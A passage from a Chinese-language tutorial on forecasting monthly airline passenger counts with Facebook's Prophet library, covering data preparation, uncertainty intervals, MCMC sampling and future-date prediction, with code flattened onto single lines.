完后后再执行安装即可。如果是Anaconda环境，除了上述步骤外，还需执行：

conda update conda conda install libpython m2w64-toolchain -c msys2 Prophet的使用

数据集：https://pan.baidu.com/s/1Pw8ZSQgD8vLJjiQUhIJv_A 提取码: taav

import pandas as pd from fbprophet import Prophet import matplotlib.pyplot as plt data = pd.read_csv('AirPassengers.csv', parse_dates=['Month']) print(data.head()) MonthAirPassengers 0 1949-01-01112 1 1949-02-01118 2 1949-03-01132 3 1949-04-01129 4 1949-05-01121

Prophet 的输入量必须包含两列的数据框：ds 和 y 。ds 列为时间格式。 y 列必须是数值变量，表示我们希望去预测的量。属于拿到数据后需要修改列名：

data = data.rename(columns={'Month': 'ds', 'AirPassengers': 'y'}) print(data.head()) dsy 0 1949-01-01112 1 1949-02-01118 2 1949-03-01132 3 1949-04-01129 4 1949-05-01121

观察数据：

ax = data.set_index('ds').plot(figsize=(12, 6)) ax.set_ylabel('Monthly Number of Airline Passengers') ax.set_xlabel('Date') plt.show()
使用Prophet进行时间序列预测

Prophet 遵循 sklearn 库建模的应用程序接口。我们创建了一个 Prophet 类的实例，其中使用了“拟合模型” fit 和“预测” predict 方法。默认情况下， Prophet 的返回结果中会包括预测值 yhat 的预测区间。当然，预测区间的估计需建立在一些重要的假设前提下。在预测时，不确定性主要来源于三个部分：趋势中的不确定性、季节效应估计中的不确定性和观测值的噪声影响。

趋势中的不确定性

预测中，不确定性最大的来源就在于未来趋势改变的不确定性。在之前教程中的时间序列实例中，我们可以发现历史数据具有明显的趋势性。 Prophet 能够监测并去拟合它，但是我们期望得到的趋势改变究竟会如何走向呢？或许这是无解的，因此我们尽可能地做出最合理的推断，假定 “未来将会和历史具有相似的趋势” 。尤其重要的是，我们假定未来趋势的平均变动频率和幅度和我们观测到的历史值是一样的，从而预测趋势的变化并通过计算，最终得到预测区间。这种衡量不确定性的方法具有以下性质：变化速率灵活性更大时，预测的不确定性也会随之增大。原因在于如果将历史数据中更多的变化速率加入了模型，也就代表我们认为未来也会变化得更多，就会使得预测区间成为反映过拟合的标志。预测区间的宽度（默认下，是 80% ）可以通过设置 interval_width 参数来控制：

my_model = Prophet(interval_width=0.95) #设置置信空间为95%(如果不设置的话默认80%) my_model.fit(data)

由于预测区间估计时假定未来将会和过去保持一样的变化频率和幅度，而这个假定可能并不正确，所以预测区间的估计不可能完全准确。

季节效应估计中的不确定性

默认情况下， Prophet 只会返回趋势中的不确定性和观测值噪声的影响。你必须使用贝叶斯取样的方法来得到季节效应的不确定性，可通过设置 mcmc.samples 参数（默认下取 0 ）来实现。

my_model = Prophet(interval_width=0.95, mcmc_samples=500) #设置置信空间为95%(如果不设置的话默认80%) my_model.fit(data)

上述代码将最大后验估计（MAP）取代为马尔科夫蒙特卡洛取样（MCMC）。执行后可通过绘图的方式直观的观测到季节效应的不确定性。

观测值的噪声影响

处理异常值最好的方法是移除它们，而 Prophet 使能够处理缺失数据的。如果在历史数据中某行的值为空（NA），但是在待预测日期数据框 future 中仍保留这个日期，那么 Prophet 依旧可以给出该行的预测值。

预测将会建立在一列包含日期 ds 的数据框基础上来预测指定日期的数据。 make_future_dataframe 函数使用模型对象和一段待预测的时期去构建一个相应的包含待预测日期的数据框。默认情况下，该函数将会自动包含历史数据的日期，因此可用来分析训练集的拟合效果。

future_dates = my_model.make_future_dataframe(periods=36, freq='MS') print(future_dates.head()) ds 0 1949-01-01 1 1949-02-01 2 1949-03-01 3 1949-04-01 4 1949-05-01

在Prophet中使用通用的 predict 函数来预测数据。预测结果 forecast 对象是包含了预测值 yhat 的数据框，此外，还有其余的列用来储存估计的置信区间和季节因子。

dsyhatyhat_loweryhat_upper 175 1963-08-01659.473243592.176200726.973325 176 1963-09-01613.132606542.378855677.590035 177 1963-10-01576.340290505.417141642.690391 178 1963-11-01545.832790478.427462610.037598 179 1963-12-01575.599488501.734482649.450637

查看预测效果： my_model . plot ( forecast , uncertainty = True )

查看分解效果： my_model . plot_components ( forecast )

更多参考： https://facebook.github.io/prophet/

↧